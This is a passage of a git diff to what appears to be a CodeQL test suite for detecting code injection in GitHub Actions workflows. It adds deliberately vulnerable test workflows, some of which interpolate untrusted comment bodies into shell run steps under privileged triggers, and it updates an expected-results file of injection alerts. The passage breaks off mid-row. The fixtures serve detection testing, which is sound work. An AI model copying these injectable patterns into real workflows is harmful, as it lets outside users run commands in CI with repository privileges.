a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml deleted file mode 100644 index 8a3b1b02a63d..000000000000 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: '📋' - -on: - pull_request_target: - branches: [master] - -jobs: - changelog: - uses: ./.github/workflows/changelog_from_prt.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml new file mode 100644 index 000000000000..9818ad420793 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml @@ -0,0 +1,10 @@ +name: Issue Workflow +on: + pull_request_target: +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - uses: .github/actions/action1 + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml new file mode 100644 index 000000000000..e5df2a514f44 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml @@ -0,0 +1,10 @@ +name: Issue Workflow +on: + pull_request: +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - uses: .github/actions/action1 + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml new file mode 100644 index 000000000000..231cddd0b882 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml @@ -0,0 +1,14 @@ +name: Issue Workflow +on: + issue_comment: +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - uses: .github/actions/action5 + id: foo + with: + taint: ${{ github.event.comment.body }} + - run: echo "${{ steps.foo.outputs.result }}" + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml similarity index 90% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml index 0ee850f183d7..0c4aa93c7a58 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml @@ -3,16 +3,11 @@ name: changelog on: workflow_call: inputs: - create: - description: Add a log to the changelog - type: boolean - required: false - default: false - update: - description: Update the existing changelog - type: boolean - required: false - default: false + taint: + description: taint + type: string + required: true + default: "" jobs: changelog: @@ -32,13 +27,13 @@ jobs: update: runs-on: ubuntu-latest needs: changelog - if: (inputs.create && failure()) || (inputs.update && success()) continue-on-error: true env: file: CHANGELOG.md next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: + - run: echo "${{ inputs.taint }}" - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml similarity index 90% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml index 0ee850f183d7..0c4aa93c7a58 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml @@ -3,16 +3,11 @@ name: changelog on: workflow_call: inputs: - create: - description: Add a log to the changelog - type: boolean - required: false - default: false - update: - description: Update the existing changelog - type: boolean - required: false - default: false + taint: + description: taint + type: string + required: true + default: "" jobs: changelog: @@ -32,13 +27,13 @@ jobs: update: runs-on: ubuntu-latest needs: changelog - if: (inputs.create && failure()) || (inputs.update && success()) continue-on-error: true env: file: CHANGELOG.md next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: + - run: echo "${{ inputs.taint }}" - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml new file mode 100644 index 000000000000..9c0b72dffeac --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml @@ -0,0 +1,11 @@ +name: Caller + +on: + issue_comment: + +jobs: + test: + permissions: {} + uses: ./.github/workflows/reusable-workflow-1.yml + with: + taint: ${{ github.event.comment.body }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml new file mode 100644 index 000000000000..46be8d7009df --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml @@ -0,0 +1,10 @@ +name: Caller + +on: + issue_comment: + +jobs: + test: + uses: ./.github/workflows/reusable-workflow-2.yml + with: + taint: ${{ github.event.comment.body }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref deleted file mode 100644 index fe9adbf3b64d..000000000000 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/CodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected similarity index 65% rename from ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected rename to ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 848e08cf69ed..67c8bbc2b654 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -9,8 +9,6 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -46,6 +44,8 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | @@ -77,6 +77,10 @@ edges | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -93,10 +97,6 @@ nodes | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | @@ -201,6 +201,10 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | @@ -229,7 +233,6 @@ nodes | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | -| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | @@ -256,100 +259,80 @@ nodes | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | subpaths #select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | -| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | 